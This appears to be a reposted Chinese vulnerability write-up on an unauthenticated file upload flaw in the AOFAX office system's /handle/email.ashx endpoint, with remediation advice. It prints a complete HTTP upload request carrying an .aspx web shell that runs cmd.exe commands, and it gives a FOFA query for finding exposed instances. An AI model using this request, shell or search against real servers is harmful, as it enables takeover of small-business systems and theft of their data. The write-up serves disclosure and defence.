认证为空的致命接口AOFAX企钉前台上传漏洞

admin 2026-08-17 05:50:49 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 文档披露AOFAX企钉系统存在未授权文件上传漏洞(NCC-2026-03565),攻击者可通过公开接口/handle/email.ashx直接上传Webshell获取服务器控制权。漏洞成因是接口缺乏身份验证和文件类型过滤,影响大量暴露公网的中小企业OA系统。建议立即升级官方最新版本并实施访问白名单机制。 综合评分: 85 文章分类: 漏洞分析,WEB安全,应急响应,安全工具,漏洞预警


cover_image

认证为空的致命接口 AOFAX企钉前台上传漏洞

原创

lin lin

船山信安

2026年6月30日 12:17 广东

在小说阅读器读本章

去阅读

NCC-2026-03565,这个漏洞的来源是金恒科技(深圳)旗下的AOFAX企钉。是一个涉及到前台文件上传的,不需要认证,也不需要账号,任何人从公网发一个请求进去,就能在服务器上留一个自己的文件。

这套系统本名叫傲发办公通信专家,深圳市傲发科技有限公司的产品,定位是给中小企业做一站式融合通信。协同办公、客户管理、内部通信打包进来,卖点正是”低成本、高效率”。实际上,把这么多功能捆在一起部署的系统,往往意味着攻击面比普通产品宽得多,而一旦出问题,横向移动的空间也大得多。

漏洞出在 /handle/email.ashx 这个接口上。这是系统用来处理邮件附件相关操作的Handler,本不该对外敞开,更不该不验证调用方是谁。根据cn-sec https://cn-sec.com/archives/4129962.html披露的技术细节,接口对上传文件的类型和内容没有任何有效约束,攻击者可以把一个.aspx的Webshell直接怼进去,服务器接收,IIS解析,shell就跑起来了。

同产品线的公开POC格式(来源:https://github.com/SourByte05/Vulnerability-Wiki-PoC),可以看到AOFAX的handle接口族请求结构极为简单,连身份验证字段都没有设计进去。基于已公开信息,针对email.ashx的上传请求大致如下:

POST /handle/email.ashx HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="file"; filename="shell.aspx"
Content-Type: application/octet-stream

<%@ Page Language="C#"&nbsp;%>
<% Response.Write(System.Diagnostics.Process.Start("cmd.exe",Request["c"])); %>
------WebKitFormBoundary7MA4YWxkTrZu0gW--

打靶的方式很简单,用FOFA搜 body="getincommingcall" 就能把暴露在公网的AOFAX实例筛出来。这批资产里头,多数是中小企业,没有专职安全运维,系统装完就放在那里,连个防火墙规则都懒得收紧。

说起来,这类OA系统的文件上传洞已经不是第一次出现了,ddpoc平台https://www.ddpoc.com/DVB-2025-9213.html给这个系列漏洞标注了高危级别,并且明确写着”未经授权的攻击者可通过该漏洞获取服务器控制权限”。控制权限这几个字,意味着什么,渗透过OA的人都清楚,不只是一台服务器,里面的员工通讯记录、客户数据、内部文件全部都在里面。

官方已发布修复版本,建议立即升级至 http://www.aofax11.com/ 最新版本,并对上传接口做白名单过滤,限制非授权来源访问。


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:船山信安 lin lin《认证为空的致命接口 AOFAX企钉前台上传漏洞》

评论:0   参与:  0